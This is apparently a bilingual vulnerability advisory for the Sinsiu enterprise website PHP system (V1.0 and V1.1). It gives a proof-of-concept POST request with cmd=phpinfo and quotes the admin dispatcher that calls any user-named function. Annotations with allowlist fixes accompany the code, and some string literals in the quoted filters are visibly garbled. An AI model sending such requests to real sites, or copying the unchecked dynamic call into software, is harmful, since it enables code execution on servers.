中文:
新秀企业网站系统PHP版存在命令执行漏洞
厂商网站地址:http://www.sinsiu.com/
影响版本:
V1.0 下载地址:https://www.lanzoux.com/i8tj53e
V1.1 下载地址:http://www.sinsiu.com/
poc:
POST /sinsiu_php_1_1_6/sinsiu_php_1_1_6/upload/admin.php?/deal/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Origin: http://localhost
Connection: close
Referer: http://localhost/sinsiu_php_1_1_6/sinsiu_php_1_1_6/upload/admin.php?/basic/index.html
Cookie: PHPSESSID=hrjbe20ssnngqee4133k125hb2
cmd=phpinfo
detail:
负责过滤参数的函数中并没有处理phpinfo;
造成漏洞的函数:
V1.0
------------------------------------------
// Admin-side command dispatcher (V1.0). Everything below runs only when
// check_admin_login() (defined elsewhere) returns a value above 0, i.e. in an
// authenticated admin session; nothing on this page suggests that guard is
// bypassable, so the issue is post-auth.
if(check_admin_login() > 0)
{
// Loads a per-module handler file whose path is built from $global['dir'].
// Where $global is populated is not visible here — if the request can
// influence it, the include path needs the same allowlisting as $cmd below.
if(isset($global['dir']))
{
include('admin/module/'.$global['dir'].'/deal.php');
}
// $cmd is the 'cmd' POST parameter (post() is defined elsewhere) and is then
// invoked as a function name with no restriction on *which* function: any
// defined function, including PHP built-ins such as phpinfo(), can be named.
// The strict() filter shown further down (presumably what post() applies)
// only substitutes individual characters and leaves a bare identifier
// untouched, so it is not a control here.
// Mitigation: dispatch only through an explicit allowlist of handler names
// registered by the included module, e.g. in_array($cmd, $allowed, true),
// and reject everything else; a function_exists() check alone is not enough
// because it is true for every built-in as well.
$cmd = post('cmd');
$cmd();
}
exit();
--------------------------------------------------
// Parameter "filter" (V1.0): a character-substitution routine aimed at HTML
// output, not a validator of what a value may be.
// NOTE(review): the second argument of each str_replace() below appears to
// have been entity-decoded by the page renderer (replacing '<' with '<' would
// be a no-op, and ''' / '"' are not valid PHP string literals), so the
// original replacement strings — presumably HTML entities — are not
// recoverable from this page. Whatever they were, the function only rewrites
// the listed characters; a plain identifier such as phpinfo contains none of
// them and passes through unchanged, which is why it does not stop the cmd
// issue described above.
function strict($str)
{
// S_MAGIC_QUOTES_GPC is a constant defined elsewhere; when truthy, slashes
// added by magic_quotes_gpc are stripped before substitution.
if(S_MAGIC_QUOTES_GPC)
{
$str = stripslashes($str);
}
$str = str_replace('<','<',$str);
$str = str_replace('>','>',$str);
$str = str_replace('?','?',$str);
$str = str_replace('%','%',$str);
$str = str_replace(chr(39),''',$str);
$str = str_replace(chr(34),'"',$str);
// CRLF becomes a <br /> tag — confirms the intended output context is HTML.
$str = str_replace(chr(13).chr(10),'<br />',$str);
return $str;
}
V1.1
-------------------------------------------
// Admin-side command dispatcher (V1.1). $path is assigned before this
// excerpt and how it is derived is not visible here; the authentication
// guard, if any, is likewise outside the quoted lines.
if(file_exists($path))
{
include($path);
// $cmd is the 'cmd' POST parameter (post() is defined elsewhere).
// The function_exists() check added in this version only confirms that
// *some* function of that name is defined — which is true for every PHP
// built-in, so the PoC value phpinfo still passes. It is an existence
// check, not an authorization check, and does not constrain the caller.
// Mitigation: compare $cmd against an explicit allowlist of handler names
// provided by the included $path (in_array($cmd, $allowed, true)) and
// reject anything else before the call.
$cmd = post('cmd');
if(function_exists($cmd))
{
$cmd();
exit();
}
}
---------------------------------------------
// Parameter "filter" (V1.1): a longer list of character substitutions aimed
// at HTML/SQL-looking sequences, still not a validator of what a value may be.
// NOTE(review): the second argument of most str_replace() calls below appears
// entity-decoded by the page renderer (replacing '<' with '<' is a no-op, and
// ''' / '"' / '\' are not valid PHP literals), so the original replacement
// strings — presumably HTML entities — cannot be recovered from this page.
// A bare identifier such as phpinfo contains none of the listed characters
// and passes through unchanged, so this routine does not affect the cmd issue.
function strict($str)
{
// get_magic_quotes_gpc() was deprecated in PHP 7.4 and removed in 8.0; on a
// modern runtime this call itself fails.
if(get_magic_quotes_gpc())
{
$str = stripslashes($str);
}
// Looks like a round-trip guard: '&#' is parked as '{^}' first and restored
// at the end, presumably so pre-existing numeric entities survive the
// substitutions in between — consistent with the replacements being entities.
$str = str_replace('&#','{^}',$str);
$str = str_replace('#','#',$str);
$str = str_replace('--','--',$str);
$str = str_replace('/*','/*',$str);
$str = str_replace('*/','*/',$str);
$str = str_replace('<','<',$str);
$str = str_replace('>','>',$str);
$str = str_replace('(','(',$str);
$str = str_replace(')',')',$str);
$str = str_replace("'",''',$str);
$str = str_replace('"','"',$str);
$str = str_replace('\\','\',$str);
// Only the literal '%20' is decoded; other percent-sequences are untouched.
$str = str_replace('%20',' ',$str);
// CRLF becomes a <br /> tag — the intended output context is HTML.
$str = str_replace(chr(13).chr(10),'<br />',$str);
$str = str_replace('{^}','&#',$str);
return $str;
}
English:
There is a command execution vulnerability in the PHP version of the sinsiu enterprise website system
Vendor website: http://www.sinsiu.com/
Affected version:
V1.0 download address: https://www.lanzoux.com/i8tj53e
V1.1 download address: http://www.sinsiu.com/
poc:
POST /sinsiu_php_1_1_6/sinsiu_php_1_1_6/upload/admin.php?/deal/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Origin: http://localhost
Connection: close
Referer: http://localhost/sinsiu_php_1_1_6/sinsiu_php_1_1_6/upload/admin.php?/basic/index.html
Cookie: PHPSESSID=hrjbe20ssnngqee4133k125hb2
cmd=phpinfo
detail:
phpinfo() is not handled in the function responsible for filtering parameters;
The functions that cause the vulnerability:
V1.0
---------------------------------------------------------
// Admin-side command dispatcher (V1.0). Everything below runs only when
// check_admin_login() (defined elsewhere) returns a value above 0, i.e. in an
// authenticated admin session; nothing on this page suggests that guard is
// bypassable, so the issue is post-auth.
if(check_admin_login() > 0)
{
// Loads a per-module handler file whose path is built from $global['dir'].
// Where $global is populated is not visible here — if the request can
// influence it, the include path needs the same allowlisting as $cmd below.
if(isset($global['dir']))
{
include('admin/module/'.$global['dir'].'/deal.php');
}
// $cmd is the 'cmd' POST parameter (post() is defined elsewhere) and is then
// invoked as a function name with no restriction on *which* function: any
// defined function, including PHP built-ins such as phpinfo(), can be named.
// The strict() filter shown further down (presumably what post() applies)
// only substitutes individual characters and leaves a bare identifier
// untouched, so it is not a control here.
// Mitigation: dispatch only through an explicit allowlist of handler names
// registered by the included module, e.g. in_array($cmd, $allowed, true),
// and reject everything else; a function_exists() check alone is not enough
// because it is true for every built-in as well.
$cmd = post('cmd');
$cmd();
}
exit();
----------------------------------------------------
// Parameter "filter" (V1.0): a character-substitution routine aimed at HTML
// output, not a validator of what a value may be.
// NOTE(review): the second argument of each str_replace() below appears to
// have been entity-decoded by the page renderer (replacing '<' with '<' would
// be a no-op, and ''' / '"' are not valid PHP string literals), so the
// original replacement strings — presumably HTML entities — are not
// recoverable from this page. Whatever they were, the function only rewrites
// the listed characters; a plain identifier such as phpinfo contains none of
// them and passes through unchanged, which is why it does not stop the cmd
// issue described above.
function strict($str)
{
// S_MAGIC_QUOTES_GPC is a constant defined elsewhere; when truthy, slashes
// added by magic_quotes_gpc are stripped before substitution.
if(S_MAGIC_QUOTES_GPC)
{
$str = stripslashes($str);
}
$str = str_replace('<','<',$str);
$str = str_replace('>','>',$str);
$str = str_replace('?','?',$str);
$str = str_replace('%','%',$str);
$str = str_replace(chr(39),''',$str);
$str = str_replace(chr(34),'"',$str);
// CRLF becomes a <br /> tag — confirms the intended output context is HTML.
$str = str_replace(chr(13).chr(10),'<br />',$str);
return $str;
}
V1.1
----------------------------------------------------
// Admin-side command dispatcher (V1.1). $path is assigned before this
// excerpt and how it is derived is not visible here; the authentication
// guard, if any, is likewise outside the quoted lines.
if(file_exists($path))
{
include($path);
// $cmd is the 'cmd' POST parameter (post() is defined elsewhere).
// The function_exists() check added in this version only confirms that
// *some* function of that name is defined — which is true for every PHP
// built-in, so the PoC value phpinfo still passes. It is an existence
// check, not an authorization check, and does not constrain the caller.
// Mitigation: compare $cmd against an explicit allowlist of handler names
// provided by the included $path (in_array($cmd, $allowed, true)) and
// reject anything else before the call.
$cmd = post('cmd');
if(function_exists($cmd))
{
$cmd();
exit();
}
}
----------------------------------------------------------
// Parameter "filter" (V1.1): a longer list of character substitutions aimed
// at HTML/SQL-looking sequences, still not a validator of what a value may be.
// NOTE(review): the second argument of most str_replace() calls below appears
// entity-decoded by the page renderer (replacing '<' with '<' is a no-op, and
// ''' / '"' / '\' are not valid PHP literals), so the original replacement
// strings — presumably HTML entities — cannot be recovered from this page.
// A bare identifier such as phpinfo contains none of the listed characters
// and passes through unchanged, so this routine does not affect the cmd issue.
function strict($str)
{
// get_magic_quotes_gpc() was deprecated in PHP 7.4 and removed in 8.0; on a
// modern runtime this call itself fails.
if(get_magic_quotes_gpc())
{
$str = stripslashes($str);
}
// Looks like a round-trip guard: '&#' is parked as '{^}' first and restored
// at the end, presumably so pre-existing numeric entities survive the
// substitutions in between — consistent with the replacements being entities.
$str = str_replace('&#','{^}',$str);
$str = str_replace('#','#',$str);
$str = str_replace('--','--',$str);
$str = str_replace('/*','/*',$str);
$str = str_replace('*/','*/',$str);
$str = str_replace('<','<',$str);
$str = str_replace('>','>',$str);
$str = str_replace('(','(',$str);
$str = str_replace(')',')',$str);
$str = str_replace("'",''',$str);
$str = str_replace('"','"',$str);
$str = str_replace('\\','\',$str);
// Only the literal '%20' is decoded; other percent-sequences are untouched.
$str = str_replace('%20',' ',$str);
// CRLF becomes a <br /> tag — the intended output context is HTML.
$str = str_replace(chr(13).chr(10),'<br />',$str);
$str = str_replace('{^}','&#',$str);
return $str;
}